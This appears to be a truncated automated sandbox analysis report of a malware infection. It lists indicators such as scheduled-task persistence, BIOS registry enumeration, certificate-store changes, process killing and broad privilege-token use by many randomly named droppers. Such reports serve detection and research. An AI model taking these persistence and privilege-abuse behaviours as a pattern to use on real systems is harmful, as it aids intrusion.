\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe -
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 5352 schtasks.exe 4356 schtasks.exe 3464 schtasks.exe 4888 schtasks.exe 4388 schtasks.exe 4948 schtasks.exe 5588 schtasks.exe 4576 schtasks.exe 1316 schtasks.exe 4448 schtasks.exe 3384 schtasks.exe -
Delays execution with timeout.exe 2 IoCs
Processes:
timeout.exetimeout.exepid process 6120 timeout.exe 4668 timeout.exe -
Enumerates system info in registry 2 TTPs 31 IoCs
Processes:
WerFault.exeSearchApp.exeSearchApp.exemsedge.exeInstall.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exerundll32.exeWerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS SearchApp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU SearchApp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS SearchApp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU SearchApp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Kills process with taskkill 3 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exepid process 368 taskkill.exe 5008 taskkill.exe 3200 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.exerundll32.exesvchost.exeIbyOOzs.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\GeoVersion_EndpointFullUri = "https://geover.prod.do.dsp.mp.microsoft.com/geoversion" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Settings svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyInternetBytes = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\LinkLocalConnectionCount = "0" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CacheSizeBytes = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CDNConnectionCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyLanBytes = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateBkCnt = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MonthlyUploadRestriction = "0" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "0.000000" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket IbyOOzs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MemoryUsageKB = "4120" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateFrCnt = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\LANConnectionCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateBkBps = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadRatePct = "100" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UplinkBps = "0" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "0.003325" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\BkDownloadRatePct = "45" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\SwarmCount = "1" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\NormalDownloadPendingCount = "0" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PeerInfoCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\GroupConnectionCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PriorityDownloadCount = "0" svchost.exe -
Modifies registry class 19 IoCs
Processes:
SearchApp.exemsedge.exeSearchApp.exeZh3M5OU4FZcI7PVNDwUeCUKJ.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\www.bing.com SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\bing.com SearchApp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe Key created \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings\MuiCache SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings Zh3M5OU4FZcI7PVNDwUeCUKJ.exe Set value (str) \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings\MuiCache SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com SearchApp.exe -
Processes:
File.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e File.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 File.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 46 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
soft.exemsedge.exeFile.exemsedge.exe48b85f34-ba76-4a43-8811-51001d013e78.exeidentity_helper.exemsedge.exeNROUveYetDLp89YeLjvoyKcP.exeT4GuP5xLZ5KygBfWzf7jpOvR.exeVdcmpLWQ4sQClzr_v_nHf2ng.exePSJX3kTgFrzS6xbKJXjbH2XR.exeLzWgYoMzjeu0S_yZPBZpgsk3.exeMFPmIIhwR3njJSHvNPzgPYo6.exe1.exepid process 1292 soft.exe 1292 soft.exe 2812 msedge.exe 2812 msedge.exe 3476 File.exe 3476 File.exe 3476 File.exe 3476 File.exe 3476 File.exe 3476 File.exe 3476 File.exe 3476 File.exe 3476 File.exe 3476 File.exe 3476 File.exe 3476 File.exe 3476 File.exe 3476 File.exe 3476 File.exe 3476 File.exe 3476 File.exe 3476 File.exe 3476 File.exe 3476 File.exe 3476 File.exe 3476 File.exe 3476 File.exe 3476 File.exe 3476 File.exe 3476 File.exe 3476 File.exe 3476 File.exe 3476 File.exe 3476 File.exe 3476 File.exe 3476 File.exe 3476 File.exe 3476 File.exe 3476 File.exe 3476 File.exe 3692 msedge.exe 3692 msedge.exe 3980 48b85f34-ba76-4a43-8811-51001d013e78.exe 3980 48b85f34-ba76-4a43-8811-51001d013e78.exe 4088 identity_helper.exe 4088 identity_helper.exe 3556 msedge.exe 3556 msedge.exe 3556 msedge.exe 3556 msedge.exe 3980 48b85f34-ba76-4a43-8811-51001d013e78.exe 3000 NROUveYetDLp89YeLjvoyKcP.exe 3000 NROUveYetDLp89YeLjvoyKcP.exe 3344 T4GuP5xLZ5KygBfWzf7jpOvR.exe 3344 T4GuP5xLZ5KygBfWzf7jpOvR.exe 4108 VdcmpLWQ4sQClzr_v_nHf2ng.exe 4108 VdcmpLWQ4sQClzr_v_nHf2ng.exe 2624 PSJX3kTgFrzS6xbKJXjbH2XR.exe 2624 PSJX3kTgFrzS6xbKJXjbH2XR.exe 4100 LzWgYoMzjeu0S_yZPBZpgsk3.exe 4100 LzWgYoMzjeu0S_yZPBZpgsk3.exe 3012 MFPmIIhwR3njJSHvNPzgPYo6.exe 3012 MFPmIIhwR3njJSHvNPzgPYo6.exe 3668 1.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
Processes:
msedge.exepid process 3692 msedge.exe 3692 msedge.exe 3692 msedge.exe 3692 msedge.exe 3692 msedge.exe 3692 msedge.exe 3692 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
askinstall49.exetaskkill.exeProxyupd.exeRobCleanerInstl3183813.exe48b85f34-ba76-4a43-8811-51001d013e78.exeDzNmPWdwKQwiMdPEyWA0pWIZ.exeUPLs6tY8WjwSKiXVW8fL8JqY.exepowershell.exepowershell.exeWerFault.exetaskkill.exec8543649-03e9-461c-bb64-bc5598521773.exego-memexec-2546849896.exeVdcmpLWQ4sQClzr_v_nHf2ng.exeNROUveYetDLp89YeLjvoyKcP.exe1.exeMFPmIIhwR3njJSHvNPzgPYo6.exeT4GuP5xLZ5KygBfWzf7jpOvR.exePSJX3kTgFrzS6xbKJXjbH2XR.exeEJegy7njpw4NcGC4TPkpQFA9.exejg1_1faf.exe93ca6fa8-9fe0-4132-baf8-6414ddbd5187.exepowershell.exepowershell.exetaskkill.exedescription pid process Token: SeCreateTokenPrivilege 3372 askinstall49.exe Token: SeAssignPrimaryTokenPrivilege 3372 askinstall49.exe Token: SeLockMemoryPrivilege 3372 askinstall49.exe Token: SeIncreaseQuotaPrivilege 3372 askinstall49.exe Token: SeMachineAccountPrivilege 3372 askinstall49.exe Token: SeTcbPrivilege 3372 askinstall49.exe Token: SeSecurityPrivilege 3372 askinstall49.exe Token: SeTakeOwnershipPrivilege 3372 askinstall49.exe Token: SeLoadDriverPrivilege 3372 askinstall49.exe Token: SeSystemProfilePrivilege 3372 askinstall49.exe Token: SeSystemtimePrivilege 3372 askinstall49.exe Token: SeProfSingleProcessPrivilege 3372 askinstall49.exe Token: SeIncBasePriorityPrivilege 3372 askinstall49.exe Token: SeCreatePagefilePrivilege 3372 askinstall49.exe Token: SeCreatePermanentPrivilege 3372 askinstall49.exe Token: SeBackupPrivilege 3372 askinstall49.exe Token: SeRestorePrivilege 3372 askinstall49.exe Token: SeShutdownPrivilege 3372 askinstall49.exe Token: SeDebugPrivilege 3372 askinstall49.exe Token: SeAuditPrivilege 3372 askinstall49.exe Token: SeSystemEnvironmentPrivilege 3372 askinstall49.exe Token: SeChangeNotifyPrivilege 3372 askinstall49.exe Token: SeRemoteShutdownPrivilege 3372 askinstall49.exe Token: SeUndockPrivilege 3372 askinstall49.exe Token: SeSyncAgentPrivilege 3372 askinstall49.exe Token: SeEnableDelegationPrivilege 3372 askinstall49.exe Token: SeManageVolumePrivilege 3372 askinstall49.exe Token: SeImpersonatePrivilege 3372 askinstall49.exe Token: SeCreateGlobalPrivilege 3372 askinstall49.exe Token: 31 3372 askinstall49.exe Token: 32 3372 askinstall49.exe Token: 33 3372 askinstall49.exe Token: 34 3372 askinstall49.exe Token: 35 3372 askinstall49.exe Token: SeDebugPrivilege 368 taskkill.exe Token: SeDebugPrivilege 3716 Proxyupd.exe Token: SeDebugPrivilege 2440 RobCleanerInstl3183813.exe Token: SeDebugPrivilege 3980 48b85f34-ba76-4a43-8811-51001d013e78.exe Token: SeDebugPrivilege 3752 DzNmPWdwKQwiMdPEyWA0pWIZ.exe Token: SeDebugPrivilege 2536 UPLs6tY8WjwSKiXVW8fL8JqY.exe Token: SeDebugPrivilege 3448 powershell.exe Token: SeDebugPrivilege 4136 powershell.exe Token: SeRestorePrivilege 5876 WerFault.exe Token: SeBackupPrivilege 5876 WerFault.exe Token: SeBackupPrivilege 5876 WerFault.exe Token: SeDebugPrivilege 5008 taskkill.exe Token: SeDebugPrivilege 5448 c8543649-03e9-461c-bb64-bc5598521773.exe Token: SeDebugPrivilege 4996 go-memexec-2546849896.exe Token: SeDebugPrivilege 4108 VdcmpLWQ4sQClzr_v_nHf2ng.exe Token: SeDebugPrivilege 3000 NROUveYetDLp89YeLjvoyKcP.exe Token: SeDebugPrivilege 3668 1.exe Token: SeDebugPrivilege 3012 MFPmIIhwR3njJSHvNPzgPYo6.exe Token: SeDebugPrivilege 3344 T4GuP5xLZ5KygBfWzf7jpOvR.exe Token: SeDebugPrivilege 2624 PSJX3kTgFrzS6xbKJXjbH2XR.exe Token: SeDebugPrivilege 3660 EJegy7njpw4NcGC4TPkpQFA9.exe Token: SeManageVolumePrivilege 5324 jg1_1faf.exe Token: SeDebugPrivilege 4724 93ca6fa8-9fe0-4132-baf8-6414ddbd5187.exe Token: SeDebugPrivilege 2472 powershell.exe Token: SeManageVolumePrivilege 5324 jg1_1faf.exe Token: SeDebugPrivilege 5788 powershell.exe Token: SeManageVolumePrivilege 5324 jg1_1faf.exe Token: SeManageVolumePrivilege 5324 jg1_1faf.exe Token: SeManageVolumePrivilege 5324 jg1_1faf.exe Token: SeDebugPrivilege 3200 taskkill.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
msedge.exepid process 3692 msedge.exe 3692 msedge.exe -
Suspicious use of SetWindowsHookEx 24 IoCs
Processes:
